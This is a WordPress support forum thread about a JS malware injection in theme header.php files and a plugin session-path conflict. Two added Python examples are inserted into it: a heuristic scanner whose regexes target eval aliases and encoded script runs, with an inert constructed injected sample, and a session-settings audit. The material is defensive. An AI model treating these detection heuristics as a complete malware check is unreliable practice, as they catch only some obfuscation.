WordPress.org

Anti-Malware (Get Off Malicious Scripts)
[resolved] some virus block me to access the site (18 posts)

  1. sonnycool
    Member
    Posted 1 year ago #

    I am running WPMS. I can access the site with no problem, but some subdomains seem to be having problems.
    On the main site (http://pgpropertyagent.com), I can scan all the files and find no issue, but Google and Firefox are blocking it now ....

    for example :
    andyloke.pgpropertyagent.com
    douglas.pgpropertyagent.com

    thanks

    http://wordpress.org/extend/plugins/gotmls/

  2. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    This looks like a new threat that is not in my definitions yet. If you would be willing to give me WP Admin access to one of your infected sites I will find this new threat and add it to my definition update so that it can be automatically removed.

    You can email the login directly to me: eli at gotmls dot net

    Aloha, Eli

  3. sonnycool
    Member
    Posted 1 year ago #

    I just solved it the very traditional way: I downloaded every folder from FTP to my desktop and my PC antivirus did the detecting job ...

    Based on my desktop antivirus:
    virus name: JS/Expack.CM.3
    injected in all my theme header.php files.
    Hopefully I really solved it. Do you still need access to take a look?
    Thanks

    Suspected code provided by Google Webmaster:

  4. sonnycool
    Member
    Posted 1 year ago #

    Or you can visit here for details in their cache system:
    http://sitecheck.sucuri.net/results/douglasyeap.pgpropertyagent.com/
    The main site has already been rescanned without issue now ..

  5. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    I would still like access to an infected site so I can see the infection in-place and test my own removal code. If you don't have a site I can log in to, can you send me one of your infected header.php files?

  6. sonnycool
    Member
    Posted 1 year ago #

    I don't have the files anymore (because my PC blocked them).

    I have added and created you as my site admin now; remember my site is WPMS :)
    Account created :)

  7. sonnycool
    Member
    Posted 1 year ago #

    Emailed you FTP access too :)

  8. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    Thanks for the access but it looks like you have already cleaned the infection out of your header. Do you have any sites that are still infected with this threat?

  9. sonnycool
    Member
    Posted 1 year ago #

    Unfortunately no (lucky me) ...
    I think the problem should be in the scanning, not the DB, because I recall your scanner detected the virus but only in one header.php file (I have 4 header.php files), and the header.php it detected is in the only theme that is not in use at all ....
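
A check for the situation described in this thread, where every theme's header.php was injected but only one file was flagged. This is an added example, not code from the Anti-Malware plugin or from either poster; it walks a downloaded copy of wp-content/themes and inspects header.php in every theme, active or not. The marker patterns, the two-marker threshold and the sample tree are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Heuristic obfuscation markers (assumptions, not the plugin's definitions).
MARKERS = {
    "eval_alias": re.compile(r"\b\w+\s*=\s*eval\b"),           # e.g. e=eval
    "split_string": re.compile(r"""["']\s*\+\s*["']"""),        # e.g. "doc"+"ument"
    "hex_run": re.compile(r"(?:[0-9a-f]{1,2}[_,]){40,}", re.I),  # long encoded run
}
# Inline script bodies; also matches a block whose closing tag is missing.
SCRIPT = re.compile(r"<script\b[^>]*>(.*?)(?:</script>|\Z)", re.I | re.S)

def scan_header(path):
    """Return the sorted marker names found in inline <script> blocks of one file."""
    text = Path(path).read_text(errors="replace")
    hits = set()
    for body in SCRIPT.findall(text):
        hits.update(name for name, rx in MARKERS.items() if rx.search(body))
    return sorted(hits)

def scan_themes(themes_dir, min_markers=2):
    """Check header.php in every theme directory; report files with >= min_markers."""
    report = {}
    for header in sorted(Path(themes_dir).glob("*/header.php")):
        hits = scan_header(header)
        if len(hits) >= min_markers:
            report[header.parent.name] = hits
    return report

def demo():
    """Constructed tree: one clean theme, one unused theme with an inert injected block."""
    root = Path(tempfile.mkdtemp())
    clean = "<html><head><script>var a = 'menu' + '-open';</script></head>"
    injected = clean + '<script>e=eval;z="' + "_".join(["41"] * 60) + '";</script>'
    for name, content in (("theme-active", clean), ("theme-unused", injected)):
        (root / name).mkdir()
        (root / name / "header.php").write_text(content)
    return scan_themes(root)

if __name__ == "__main__":
    print(demo())
```

A single marker such as string concatenation is common in legitimate themes, which is why one hit alone is not reported; a reported file is a prompt for manual review, not a verdict.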

  10. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    Thanks for working with me on this and giving me access to your site. Based on the malicious code snippet you posted, and the files in your quarantine, I do think this malware is in my definitions already.

    Please keep a close eye on your site for a few days to make sure the infection does not come back. If you do get re-infected, and I hope you don't, but if you do, please let me know right away and I will look for the source of the infection too.

    Aloha, Eli

  11. sonnycool
    Member
    Posted 1 year ago #

    Seems like your plugin conflicts with WP Social Login.
    I tried to diagnose it and think this is the issue:
    the cookie is saved here: /public_html/wp-content/plugins/gotmls/images/

  12. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    WordPress does not handle sessions well, and some servers I've found don't even have a session path, so I have added this to the top of my gotmls/images/index.php file in my plugin:
    if(!session_save_path()) session_save_path(dirname(__FILE__).'/');

    If this line is in fact causing an issue I will have to look for another way to fix the no-session issue. Can you rem out that line and let me know if it solves the issue?

    Also, what are the symptoms you are experiencing due to this conflict?

  13. sonnycool
    Member
    Posted 1 year ago #

    Symptoms:
    When I click on social login, a new screen pops up -> redirects to this page: http://pgpropertyagent.com/wp-content/plugins/wordpress-social-login/hybridauth/?hauth.start=Live&hauth.time=1374262225
    With your plugin -> You cannot access this page directly.
    Without your plugin -> redirects to the social network API or login page.

    Below is my website info with and without your plugin:
    Without (different part):

    SESSION:                  Enabled
    SESSION:WSL               WordPress Social Login 2.1.4
    SESSION:NAME:             PHPSESSID
    
    COOKIE PATH:              /
    SAVE PATH:
    USE COOKIES:              On
    USE ONLY COOKIES:         Off

    with your plugin :

    SESSION:                  Enabled
    SESSION:WSL               WordPress Social Login 2.1.4
    SESSION:NAME:             PHPSESSID
    
    COOKIE PATH:              /
    SAVE PATH:                /home/xxx/domains/domain.com/public_html/wp-content/plugins/gotmls/images/
    USE COOKIES:              On
    USE ONLY COOKIES:         Off

    Hope this helps ..
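
The diagnostics above show the session save path moving into a plugin directory under public_html. The following check is an added example, not code from either plugin or poster; it parses that diagnostic format and flags two session settings worth reviewing. The sample text is a constructed copy of the "with your plugin" output, and the document root value and finding names are assumptions.

```python
import posixpath
import re

# Constructed input: copy of the "with your plugin" diagnostics from the thread.
SAMPLE = """\
SESSION:                  Enabled
SESSION:WSL               WordPress Social Login 2.1.4
SESSION:NAME:             PHPSESSID
COOKIE PATH:              /
SAVE PATH:                /home/xxx/domains/domain.com/public_html/wp-content/plugins/gotmls/images/
USE COOKIES:              On
USE ONLY COOKIES:         Off
"""
DOCROOT = "/home/xxx/domains/domain.com/public_html"  # assumed document root

# "KEY:   value" or "KEY:" with no value; lines without that separator are skipped.
LINE = re.compile(r"^(.+?):(?:\s{2,}(.*))?$")

def parse_diag(text):
    """Turn the padded diagnostic listing into a dict of key -> value."""
    diag = {}
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if m:
            diag[m.group(1)] = (m.group(2) or "").strip()
    return diag

def audit(diag, docroot):
    """Return finding names for session settings that deserve review."""
    findings = []
    docroot = posixpath.normpath(docroot)
    save = diag.get("SAVE PATH", "")
    if save.startswith("/"):  # an empty value means no explicit path; not assessed
        save = posixpath.normpath(save)
        # Session files under the document root sit in a directory the web server serves.
        if posixpath.commonpath([docroot, save]) == docroot:
            findings.append("save_path_in_webroot")
    # With use_only_cookies off, PHP can accept a session ID supplied in the URL.
    if diag.get("USE ONLY COOKIES", "").lower() == "off":
        findings.append("session_id_accepted_from_url")
    return findings

if __name__ == "__main__":
    print(audit(parse_diag(SAMPLE), DOCROOT))
```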

  14. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    That message is from /public_html/wp-content/plugins/wordpress-social-login/hybridauth/Hybrid/Endpoint.php

    I was getting that error "You cannot access this page directly" with or without my plugin enabled. I tried remming out that first line of my plugin that changes the session path and nothing seems any different.

    Can you show me a working redirect without my plugin enabled so that I can see the difference?

  15. sonnycool
    Member
    Posted 1 year ago #

    You can visit my site; I just tried, it is working now :)

  16. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    When I go to:
    http://pgpropertyagent.com/wp-content/plugins/wordpress-social-login/hybridauth/?hauth.start=Live&hauth.time=1374262225
    I still get:
    "You cannot access this page directly."

    What URL can I use to see it working like you see it?

  17. sonnycool
    Member
    Posted 1 year ago #

    Go to my site pgpropertyagent.com -> footer -> click on a social icon (fb, google, msn, yahoo), a screen pops up .....

    You still have my access right?
    If you activate your plugin: after click -> pop up -> stops there ...

  18. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    So I have removed this line at the top of the gotmls/images/index.php file in my plugin:
    if(!session_save_path()) session_save_path(dirname(__FILE__).'/');

    This line is in fact the cause of the issue with your login widget. I will not have this line in my next release of the plugin as I think it is an obsolete fix for servers without session folders.

    Please try it out and let me know if you have any more problems with it the way it is now.

    Aloha, Eli

Topic Closed

This topic has been closed to new replies.
